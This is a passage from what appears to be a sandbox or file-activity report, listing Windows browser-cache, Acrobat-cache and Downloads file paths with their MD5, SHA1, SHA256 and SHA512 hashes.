| SHA256 | 4f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2 |
| SHA512 | b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | bd9b71a89a52dc8babc85e01d0c36908 |
| SHA1 | 493280d812d3ede30413d1c1b954f61b1f6e07db |
| SHA256 | 96e270bf5ce742f24c78aeafa0db77075ecd21ea2e1f03adc3a7a11afdbad5d0 |
| SHA512 | caede39694ad10f769e7ad4da9e3ad0fa0f4e8f14ef8e39ca32b54668ddd9aa2577a57107ad72e14749ca5f82f1ad452f9ea5dd6831cd93a0718d94c5ff65ec4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 57929c627e183e5a8fa38886ad7ff48e |
| SHA1 | 9e7d050a1a97788fa0af5329ff33aee8f53d3180 |
| SHA256 | 5d1b2a4601c467228e72506b86b5b72ec5af61e0a81bccb7a5978e9fbd866721 |
| SHA512 | 8f1da148053a8d26dd98f7dac88b3fda5df01ef2c0ef6f356b912868cf52166e430920b30b40329892a398667a7950e733622730bb5dd1c5a325dfde24fcb55b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd124df59afd30112eecd9fd8f8b1d05 |
| SHA1 | 497a475a882d978607672b12ed2540ad028fbbdd |
| SHA256 | e1086b954c203c9cd0d2d159095a1b41519c2f7f21616e9fbd598bac56645ff1 |
| SHA512 | a2c8d5e97e97fc3bb3fbbddb0d437784dd961f3afa5f2c9be0c3fb2be128ef1b138fbf61bc34116c4fbfbc9a8386d44bba0967e59f6133b4813413fb722a1671 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ee801dd4accfbb8173e3674516c0138e |
| SHA1 | 877414b02c860493198790d2b0dd9335c3571da4 |
| SHA256 | 8807bfc8982d53fec22d78aa8db9e4d51bbe42e4558e08f4dee5d43632a49d19 |
| SHA512 | d7200417825e5cfd510edf68acc3fa7bd038187bfb766bf95f54887dfb196bba0732bf61a1e143ac5c9e446c414264d300f85674d1e75b3b12faa00cc08691a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8b8ea74c646c50d4e020635010a8f29a |
| SHA1 | fd30268d81b98568dddbd50d942e9b40e323e840 |
| SHA256 | e68aadabcff08c7016c15dc90b5a2285deee3dfedb591c85e12887a46b926c4d |
| SHA512 | 6a689f698be4fd40bba880fd1087b6ae9c0105ffe1d7e9c4f211729e1f46af0bed25a5cb5bdc9e3c2c818bd6f2937b74d0ad3798557fff25c5ef909564512c19 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0bf72a0377faf81eaef2c52fe6bff43e |
| SHA1 | 4013c51eebbea1e75c4f5fb36114724def2a4d8f |
| SHA256 | 3675ed5a953fa9fb5fd8e738c350f0d3f20864398de90633a0966dd386aec7dc |
| SHA512 | a4586250dbf865b87878a66c19f085fbcabe150711155e37f2fc5c24e63cd2ae2f08d6375562e54e517493f958eda3714ac357c5741f893c108887f0739bbebd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
| MD5 | c71e661f482d2a7bfc565060281b324f |
| SHA1 | 4f66536e4d59091e4ce33e84207965c51330ecbb |
| SHA256 | 60edc95aa4f8233ce27dd1b122a78632a0b9aa5be0f183b27a08dd9fc58a4932 |
| SHA512 | 7bf62c927d45ba24d1465977e8d741b2aba4faee95f7d3767fbbd781c62b3c6bc97e1fb9f525d43f3c77202ae6f8904f3389c3ffc84c306c43be876ce4a180c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | 9518a5fbff2ea2c7eec7a4320c9a06b6 |
| SHA1 | 4a7733b97c30f0829563ca48d8feefc4cf10e819 |
| SHA256 | 365efabbd032f178ecc66723543af28308757534c5eff14cc1634cf29b5835a1 |
| SHA512 | c3b13039c16d299453ddfc989a99fc129466baf7447852fe0525ee08a47a37ff7789632a127e324f64fc4a3f2cb6970271ec255960864fca7e51318536609952 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e
| MD5 | 609130b4a8a71bed6310bcb3db155b6d |
| SHA1 | 639f14b814da4166e36b08612636652b05db9d92 |
| SHA256 | 8cd71f142df605d3fe4f60451e9fa856a69db259d0905f510709aa3f4cf5d76b |
| SHA512 | 99461a47f063892e708e34df4b0753eaae2fcd6b9b2680b96192cff714dbd8057bc8017d68ca62527ba5317a64cc63c8c6e0ef2bda90ba22a1127f297cd88d93 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | b9e8a1eadc92edebbee873de0dd92e6d |
| SHA1 | 2536fd423be49a7a281064e8b32c0e9ade5f8c27 |
| SHA256 | d946878fa7a833b27a987e520f0f55f48f8c7902b1c328449ffa220f5fbe4c76 |
| SHA512 | 0bfcd333024d97356d25729c15d0e8a4d4e236a91ecc87b0780fc93df8814b0d73df04ec8c3f1192868fee54660d8104f8e9bf563706c2b08c07a04f845a26c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4d5b2d1e29719a85d6aef9289114ce46 |
| SHA1 | 68758b40ee1f373669d083c6e989cf17e148dcd6 |
| SHA256 | e145ef6fb9e8b95607930ac328d8cc641b4c835988ea00d75b23e93ea039d499 |
| SHA512 | 43fcd071aaf9742550a3cf9681272fe1a4a3f77e8c83aa593a551d48e6954084a8bc9537a876e74af3a924c6694389878c2d17b0bfb89eb1731a0675c082c7b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a665767d69e2c00fd7b8dd4cb8b74558 |
| SHA1 | 0e848b1987fd6fb6bb99203339655fcce1b221a6 |
| SHA256 | 5453d60209080e3270af222c5a0c16b1b773e61cccf63388126d044a71b72ee5 |
| SHA512 | 268c60de341ee89b6d91d43f8b3530239c2a7fc6027c4c19fa5653a3510ab2926594b7108b3c2fb821e87376faf706704be4c9f214c64810fb68f583e490f5fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 72ad83578bca83786308660171e11b57 |
| SHA1 | 203f5b2c771f2a90ac1bae702f486156e110d503 |
| SHA256 | 99c3f1c066d91cc31afda874844a6f6233697ca377ff6df8ba264e7f3d7bfab7 |
| SHA512 | 956ca761a604170eb8d9f7141cb0cde5598f02ee54935fad5adf3fea41207bb318ceac29060d7eea7a92eb40ebdb5051899cd18b327690e2dd6d07e7302fd567 |
C:\Users\Admin\Downloads\Windows XP Horror Edition.md
| MD5 | e6bcdfe913b0b19bad3ba37b2c06b65d |
| SHA1 | b3fc0d7c10eb73484673172981af44bdbad1e581 |
| SHA256 | 60e8cebd0ab2fb6cc2c279114545c4d3bc2504788574121edb4d2aa842312794 |
| SHA512 | ceffeb0388073a0a90054ed77dd63bedd6f1cb78a21e7974a0656ddf1a9cc2d2082cb490d7eb300fd5b2cefa5145ec06cce4d648f4fd1c402967c73668fb6ed8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 86f9f0722e17e364edaf7d5bc692ae35 |
| SHA1 | debb7a435c4278ae7f6b083e264a7da1e4b4e236 |
| SHA256 | 0d937853bf6974ecd72f583097d68e403d7cf44d7c5deba15bad3ff004e65093 |
| SHA512 | 5a911b35dc097f0b7d02e126e52736359292b26bc5e3dda700a15d2ba44832cd8d8e97cd3a1869919a4585a5c319ec404859b75e7e7b19df7283fb3784bc5d14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f95102a2572c9fba5b37f7fb243c89c6 |
| SHA1 | 630e33d97f7005e1c8bac241f946ac9569bd207b |
| SHA256 | 96ec4f1bccac43bf73518a298d2b6c8331dcdd26d6fbf70e47690e3880f6f29f |
| SHA512 | 4c2bf46abdbd9bd0a1154d3f305e9a563245ef3adde3f5fbe53a385a4d97f4a068173c1a45607c9e025374e89b92c3be9f965992f256eb56b94cccdafc152f93 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1539a80d3cc5e1b27d4a5286e6b9c77b |
| SHA1 | 2a844f6f6f2b583f51930de9d58a452bdeae30c2 |
| SHA256 | 9227562bfb54d261c27e1bd4cdd82974884011ec078ac3baa622bb8c6c1baa57 |
| SHA512 | 3c592c5300040f8c7565a2a4cc1bcfe5f4fdb2cff83048dc2941056b2cb67480a8c74eef79f0f138275d6c13eb2ba711eb4f69f41f381b10243d87682f7567c8 |
C:\Users\Admin\Downloads\MLG.md
| MD5 | 944a8a8e1d6f8fc575d745de547ac61d |
| SHA1 | ad4700e5f66f418c5106c0893693a8f3e3bc4689 |
| SHA256 | 81871a5b699a88f31beb4cfae3025c2df7dfd10477af16e94b06665a136280ac |
| SHA512 | 511cecdd9d25e97ae2965f3f7378f991727849995f894d9fe18a048be28e5fde2e00faa1e0dac88bedf00f46b7c1315ad6582b7bcf754ef790d8ce1d5174d5e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 700d7b925cf1920eae0561b894063989 |
| SHA1 | d5b5cc18415c40ff35dbef69054249ad725ffe33 |
| SHA256 | 81bb2853433f4b9d29c2e2fe32c44829efe47c16683b644b8398e93b52d9f28e |
| SHA512 | 42ce355b3c319f5e223708870a930e052f7622c84a3246a94a06d6b5957bcc743fc7dc9dfc7488321d9a3ae52ff9cf64501218b02c02172422429e2f87e22d3a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | fc179afd5d4b6387f1cb7028dc341104 |
| SHA1 | 4ed575282fb3b26de6eef7c7f0baa73c1c09a469 |
| SHA256 | c5e46a1550fcb59cc7b1af6fa0e33474f4b47352cc596dabcdfd5f0dece2746d |
| SHA512 | c7b744d1f23297a43d316b969307ca3e6daa9c69d38b84677dcb5a87d717283f43d42eb78ab4325a5f3374c7893efb30b36d9b86ac56cb48e04ba4afd92af868 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 72b2096ea7e9c2369ecc07ff17832bcb |
| SHA1 | 63c50a74dc60393a80f319669247e4ac58dcfbe7 |
| SHA256 | afb9c445714950ec78e4d6f8bd030b18825422cbd43f3f690230a0723446dd2b |
| SHA512 | 84636f8270c5ce1bb0baedf46320292609ab5a3d62e4b23cd90f0e28ac4fcac59384fa0e256837d446ffe50a9bbbf020c2772e623de4ed2606d40fcaa7400740 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8c00a30b007f947cc26d275a65acd1e5 |
| SHA1 | 1dc00393d1fd29ff61340b8d110a6f428f96d125 |
| SHA256 | ea188492223f708699d9fc12de35cd7231ea8bb6ba8ef223027f0fd23d76a2ea |
| SHA512 | 57c4e4faf74745995d0156f749768eb760c9fae31bb44075959f59732a0cd8cf429c2d28abdc06cb351a8fb1a4c2082c8253686e43f399de80bece65adfa13bf |
C:\Users\Admin\Downloads\BUG32.md
| MD5 | a6e3b08f3da9932333bf2de25ee538f1 |
| SHA1 | 309e4abc4aec19113b902646b7f214d320a68d55 |
| SHA256 | c8370843d7e1f04992ab9424b0a15512ec1f81f0ad81652947eba9310f164bba |
| SHA512 | 2e8f7e7ae59d6a8c656584b8d5b0672d110bfec2e8ab4a9a5919af875453c9bf2b6e8153bf6a0502f335c347fd74c94ec0c56b88a642051058777281da7a05e7 |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
| MD5 | de6b28c3b7012e0de074b2b958f2570e |
| SHA1 | e1991028f2f8cebb4d8d8a45fdc2c95bb6d5fad3 |
| SHA256 | 4d047df0cfd44e385f6c21507eacbaef60113eb2dab72f391313f1d779a78468 |
| SHA512 | a666c7648c3ed36a231889c2370b1a37f4c05410cf96c5aa3b273526fe45e6cecc82753ead1b78beac7043a25dfb823a95a5955da7e25d3eb213dac497f8b1da |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
| MD5 | 3da54b6ffa2d854603bbf4e214f17d72 |
| SHA1 | ea6111317887bd4d67025886a9acec14aa1a9407 |
| SHA256 | 6532910bd09e0893caa81cd3217a65890f2799b506c871b3a5d698473ae7e3f9 |
| SHA512 | 41cd01658887682a3afa3c8f7e15caec9874f0e5a87ef93e5a56ebd97ee87b531a9e899fcffb3f82a0a01563eac207a9938e2eecb87d805263b4a3d1ff79e784 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 96fd2bcd205a04361dc81af46677b319 |
| SHA1 | e5c25426534479ed1cb61713cd6bbd7d2e1a69f8 |
| SHA256 | 99071742e30042626da21b8ae857d22b96830035a16f4d056ab79caf3e3aa280 |
| SHA512 | 3894931a09cdbb8f2e9755615b8277bf8731388b0a43dda2a1266ead2ecad2162077a89fe70fc294f84f10ed5f34c646fe600504528e1c1d672eb0c33157ea32 |
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
| MD5 | 92ebd01f7bb919da6500fb74f1ec3d9d |
| SHA1 | 2e4ea9df00c2da8bf67731144125623e606c843f |
| SHA256 | e68425d2da90e2a73504b699bcd3f012e3cad27b44ba5e1fc8feb5320d3459a6 |
| SHA512 | abac92cefa39978fa51c2821be88077a67966ed47acda5d219c17285a83b4ed67e6553106d8f0b6ce30189b4abedbc8df3794e0b8b535f033c69c9eb249ebd3f |
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
| MD5 | 298637607244c741872c976cc6c8d838 |
| SHA1 | 589e7096409a67b4edf2a4b31985b30e96dda4d0 |
| SHA256 | 3b6378d85a811f7f815aa313aafbbc30d7cfa4c0f1cafa6e3d58b67fff39809f |
| SHA512 | 928326e8ec55d5e1f88b2c8b965ad69ca7696b400504aabe47b081bd6fbc2e3c851a1ecb549eb66f2370150b9f3a9c41fb52a20d1858c9d7c370b2cfdb182255 |
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
| MD5 | fee1e3e7bb682346d7b954d2d0f1b5d2 |
| SHA1 | 5dfdb79462c4116bc96d976d41bf06391cb87a33 |
| SHA256 | ddfd2eafb75da5a029c5e73e38627c2ce8a79707e92574b54067b04af1be3387 |
| SHA512 | b53ba3310f5d7f7309adbc56144978ab8fc6e8d718b752789d02aaad425ae953bba0fe4883c490bde08351cad7aa5d871ebd5ac47ad2a40110ef4f069de266bb |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
| MD5 | 2c61a191a329f2574ed99fa59234bf55 |
| SHA1 | 4eed6a102c95e15257e14e2f4de7e841c7e80a5d |
| SHA256 | e680a0ac3334edd63a5c994d4e95648651ccc0ab76f3f5cac5eb42ac361bf929 |
| SHA512 | 57eb2277d2d50ca3aa84cf5d5185223afa2d7306894c2c4e85a3446576fff404eaae2cfc4fac434c6511aea7b46477b1efe4c2cd673088af41b39c0761e658c0 |
C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
| MD5 | 1796ebf4d5fafcc657e884fa07309ede |
| SHA1 | cdeaada58750308a1d0dcdc068afc47e381c6aee |
| SHA256 | 321a669f0e9d161373ca7f6711626b0eef91975ee4da1627ac9fcee05345cac9 |
| SHA512 | b1072b40b497457ba65fccab6038f187de368475b7e5a369f53d477484f6abac6499e3dd44106403d8c07c0bbf3d0f05b4c31d78cfa2a3066c2acf237f8197af |
C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1
| MD5 | 6b36cf4eadec8eb80fd9e34d87733f4c |
| SHA1 | f268bf1fa91777a8d734edab40c9a1a8acdeb596 |
| SHA256 | 1e51c728092a6f993fc087f5b6327069b184c8aad78d7be28be822357b38606b |
| SHA512 | be0c08a3b5f4f26ae8bd10d13d5e33d0ca6af7283ea28c45cbcc4c955fff93b52fd7da7646b57b2faa3d42e19925a63dacb828f0e60144e53ab1a7f0b15e70e1 |
C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
| MD5 | 651cf68c0b644f728ed64aabfc3ee4a9 |
| SHA1 | 76844c135f8f7847af955ce5edfa45a81b6d6c82 |
| SHA256 | 33bca1977b3be8ce3fdf6c9a40816cb8e1e1a2b686e798f76bb0aeb29034a5d4 |
| SHA512 | 9f84c76151fafbb273609a9e87cbf63165bb390223f9f4a79600e6dfc7f7dec126aec563a817a8a610aed461fa615cdf0628fbddced2877099a9d438cc5a2daf |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst
| MD5 | b876031eb6d74e3e15b7ea1fbe3ffac1 |
| SHA1 | 13bca3b42680aa2ff641cdd663fd722136d2e861 |
| SHA256 | 68d1e50fc58f8d77f53b64b7ae5fb3cacb9fb78d4b31ed80dabfc6f438d2c351 |
| SHA512 | 95443c10178078012aa8b4ecb5e85d455006342b20751a9f2c1222d80f35a338b59fbf074104f17a6a5d90ddcf8b129f6ef475366189fcca9220bb41783f1a4f |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst
| MD5 | 700e7d6f9cfc26cea4d04f65f02b3452 |
| SHA1 | e5580200e54edb7cd4f7c5daada5c031434cf334 |
| SHA256 | c3d8aef5d450a90e4a51335532c977515e589143be772697e666c8c9f4ab0c0e |
| SHA512 | 1cafa5bab9838052312d8a6ced7d9baa4f28ef77d48681ada4dedf29400d235b51e187a1f207cfd8e008ee6274156cb7ef2821fdf7cbcc65d697ff4f469d7a82 |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst
| MD5 | d92be63e0b074119484fc058e639dc3d |
| SHA1 | 6e25e73ff12e65100ec998bca37dac0abea6cfe3 |
| SHA256 | 7e34b5b8ffa1099ddeabb0af1804b2861c45627fa1bcf22bdeb37d78d16eee10 |
| SHA512 | bd9a84030eb6e9efab9b5b68941bfb88e6ec38ce304938fb32a97fcea6de11d323c6d4c2b187cfb36b76e8de76dab2e01a796443479b908cd93d7faf61fb800c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7e478305eb0d30e12dc2075232ee1c93 |
| SHA1 | ebcd84ce8f84a6705b29e571066bb59a128df1e3 |
| SHA256 | b883c56317f024cdf0cd621c6825c8befcf794aba2caf2a7b24cde78eba1cbc6 |
| SHA512 | c7386ebc8744a7190872d279ed1ecaad6e857052d059cf1aa6e559e422425c4b93c4ed93791de0fa13fac8b21510b9985f507a209fd2b0a621830662fcc5dfdc |
C:\Users\Admin\Downloads\MrsMajor.md
| MD5 | d256b5ab1954e7fa2638b02bb1601ec1 |
| SHA1 | cff3618ad44a275a4b0afe6bc3865b2253faa4b7 |
| SHA256 | 0119352fe24a6307f700addd4d76b8f4270361f265012cce90a362f56e1d9243 |
| SHA512 | 136c2df11264a527a0b085706ea5662162ed244bc006da5e81aaf97313c13358ee00ca2c2d67a7f019d449c80aeb4fd646c3872ad3ad87501718232e8ba96603 |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
| MD5 | 885768618884757a5f46b4619e0d33dc |
| SHA1 | 9eed706694da4aeacadbeebce9c6936a5114514d |
| SHA256 | 71bd44287419560891f74105a4b68115663651e7f2023ef882f8725f2a58f3aa |
| SHA512 | 088df4c6d1a82978a4dc23b80538b35e4870bb96b7eec6d52bf51cabb55845129ebac108d9144fb82bae765f9f582ae379c7de348b40d552bc3c1f782919b1bf |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
| MD5 | 4df7e5b90aa0b3029912588820b3a03c |
| SHA1 | ad9b6b25fb5e430e5921fe568f6ac953df3a1283 |
| SHA256 | 667d1e517d6421155470655daff0336a6bebd96c901f2da7c74548720dea2a49 |
| SHA512 | faa2b7926c556a420ae155d23c0beadeb43f5ae02fa35d68011a53500b1c2776c9ff95617efb32532cd1b9d63903c9569d682ce278a5642437b43cad0d397987 |
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
| MD5 | 4c1ba8fd2c3b0d920d7799c6ae74e56f |
| SHA1 | 668cb8aff972e70148f915a3f782a4fe956047e0 |
| SHA256 | eb2ee2019f57f715ba46af173362530aea165b59d6fd0281f3eea7bf9ee4fd6f |
| SHA512 | 4af923d0100fc6b529cc2f7c1389b6a7d48708b7a2fb7e9b019c737fbef1ba6c2708c8a3c92f84415bd2e190c4e0867aed295b5e1bc1431545e9e7e16bb54b81 |
C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1
| MD5 | d640010b4904a8340a3f1abbd3e023fb |
| SHA1 | 261077c4efdff7c7feea6bc05943ad4e73893189 |
| SHA256 | e38744925727fc00bfc0484009170a66802bf1aac3d0d49ddc2176adbfae148e |
| SHA512 | f35db40a76b11a74d97eb766f9ab00b7b711408ae3eef1a45f115d1adff91e5bfb692139e2947a9ff1e23c35b4794b7aedd6b64fe1608dbbf62d562f7d94f137 |
C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
| MD5 | 911d1b3697449e072e1b24edb945ce31 |
| SHA1 | d51c5bb1aa9d2b4a6f48f312704a1625e68df1fe |
| SHA256 | e09923c4cda87aa932ad2ce18cac3f66c87e942bce1f642d56d4403b0e563a24 |
| SHA512 | b6ca817f2a9761fa7e3dbe5c2daeb1bf5c93700670cc38ba7a971e7d92097f5f3cba0390247457cd6ea24f220783b999321ebd5b8708e38458f7e13fe92fdd4c |
C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1
| MD5 | 1c9fda4ca6e16cf4866921748e52c7b5 |
| SHA1 | c7490391e536865145b0101b1d6922175da2f6d5 |
| SHA256 | 1fe81a8295859cb8942409d7f7aca20cca3c35c0ee6a26ff14bb50e68ab4b989 |
| SHA512 | a7817e015ae738716305bf02fcd834a46e2933c118d2c91ad7bcaf5174dc4015524b233aa13cf00d7d8de12d7752ff236694b37150fc00bd6a637f6f10f862c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1345fb1cdedba0b63b1759cd22bfefcb |
| SHA1 | 0f3b19e2be565077782eb09733b2db115e960c17 |
| SHA256 | 2c18a7dee088542d7995fb3daafa4769d623b687a3ecf3828c3572194a6d32b2 |
| SHA512 | 374998bb89e97f2453ad1808311bb484017edcc550675863ac37133fffdd03dd81168e53021bc23acb34da93efe5b900d7ac0faf2a978a30cd40aeb25eb17ef6 |
C:\Users\Admin\Downloads\Unconfirmed 534704.crdownload
| MD5 | 187bbac84c1878d4427fd901d1f85557 |
| SHA1 | 094a4ebd3c51923878b83a516545f12d7f556439 |
| SHA256 | da8a8541e7b6c33f38a1c9607073989f08dec0695c18c18b15c8af199a807600 |
| SHA512 | bc6962debd2b679ddcbb080607c2d60dbbda257f58f5303496f5ffaf6e448c3eea1ccb7ecf4f6bebb4de7c0016fdc12b4fae311d12db937cc4aade5f14ef373e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | f415bf482a13d22dd7b15525eeb29790 |
| SHA1 | c1fbc6c0a5dbfc54567409ba7bd244abd947793f |
| SHA256 | 885f1b765ef176dd6237cdfcd6bdef0b6677e96a131241861737d97ded053e2e |
| SHA512 | dea2b22b706641c97f1c71dcc238e327cd835536a44a7d66e0d460f083305042baa40b9295cbd696308a6307033873018340081d55a294cb97a771936bd60bd3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 52ba513bfa13031e5c448d5ff8f45ac8 |
| SHA1 | b42e51fdd2a4f06fc557d18446c3198125f66b23 |
| SHA256 | 338209c6254ff97c8242af540708fac7267e456a38e05c9851e91194c3cc6163 |
| SHA512 | 424d1d2bdbc6398622d28db278159c5c0da9d18d70e7d58aa079533b068f202342aadf124197cdacec23c6f83a54443a49aaa99a1279dc776d37fa96ab619d0f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7e52db924427f191deefe11776f81baf |
| SHA1 | 0b5637aa6b44b836ae5be1ece3b9839d4ccefcd5 |
| SHA256 | f36ca68fdcc460ae532bd694dd6e56a05fd972202d4d07726cf85fd17e11763a |
| SHA512 | 67f0e8fbf4b7d6b0703adfe4248358295486f938bc40e893a9e0582481903d556cc9fb04cc00bc897a65f624ba8f26568bf7b23127fa240530976ec3c6f3b099 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012
| MD5 | b2d384c8292ec850cf4646d6b295d17c |
| SHA1 | d27a44d77659fbfaf2fc92fbf4fdc1672c014a8b |
| SHA256 | 1e41e8bb549e6a3a4c0ed46397e9c6971d6382456c726692d107e8d2dddd4fee |
| SHA512 | 2e1670055c13f3234a418f120e97c2e05f87976c011347eaaa3d8678fde833106a9ce2ac0442f0a982984467860652532d766a3fc9bc386edf889d6340a117ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a
| MD5 | 87c2b09a983584b04a63f3ff44064d64 |
| SHA1 | 8796d5ef1ad1196309ef582cecef3ab95db27043 |
| SHA256 | d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0 |
| SHA512 | df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013
| MD5 | 677d9c8fc852104fdeb5eece3cc6f504 |
| SHA1 | ba5027dda0fdf2559e274e6124ddd3b82bc30437 |
| SHA256 | 5d2094f5acc56fed35c37d0a748ef5f467c9e31f0d86dbb46cef46489ba92327 |
| SHA512 | 1a578ec149be1f25b7e825397a38f7b3a9c56a0963b2330d3a24129140786a7282e494e6691faf09c37af42dc2ca01c80252f41a2a7105b25e4e8fbcc31b5234 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015
| MD5 | 782c27ffc28e8c176cc4389976a562be |
| SHA1 | 7577fe5760ea89fd3231c8dd104a34ad357672df |
| SHA256 | 792b56e8bfbf9f08266820658dbb67acfd622317c6457951e1465ad333dbb56d |
| SHA512 | b299bb3c24030743adbaed3cab7919b0dbe6ed9cab9d84158d888a7d19ce2ac335f413b461f89be1f63c84d90d24ec2646a2e25ed0a0c74e7d70dd20f0e469fa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016
| MD5 | 95457bd657bd9a47921e4603268bc0bc |
| SHA1 | 63a2befa3c8c76d5f36d27b578093160dad72bd1 |
| SHA256 | d43ff91df15cd7c3c8a881cbec7f7b742fd86390190f919188a5cede7917587a |
| SHA512 | b68e7f25ef26adfbd30108882ec6c99b9613eaa74536c08d31cc5809dfda4dbb8847ca2192e40e8958eb537d5b0654ba831838f9beb646002f6523b21eaa9f3b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017
| MD5 | 17fba2da693dca50d5654776f28e1731 |
| SHA1 | 1a5d4fa00d30e7140becc2d916520e87c8e03c1f |
| SHA256 | f1db9851128081566a676107f61bdd135d55e725b81a551272b8d3c809a94ad7 |
| SHA512 | cc04489f11cf2d97b5ee73f0ed88234b1681cf0de11ee809fe928d9361d336d9d72b76ee3d7db5add45e4ef2f5edd696a9ce6c97a34b64be2fc420493615e3a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018
| MD5 | f49110329f18f4e694521dc01ce53eda |
| SHA1 | 33b6daac653ee74526f84615b3d6bd4be5cca87c |
| SHA256 | fa993a91620c8b490aee9b90f61ff59106f6048bbae760b831eded74a0fbac8a |
| SHA512 | 33e43b09c501ab0cc9c53d5f3ce2b7b92f15c47f43ccf4146f121157bf8518935f2dfbfc06e04c6f7a790da1b6b0be91397db9b2729e33932293404829aac88c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c
| MD5 | ad7d9126b4711f5a6b10a8d3425c1dcd |
| SHA1 | 575bb66604aad364dac5e2ef00457a5f739011a4 |
| SHA256 | 51445a7292a38d4a9ce7d26855590f8e71fdf2dfffd18dee5c6f5dbe31317003 |
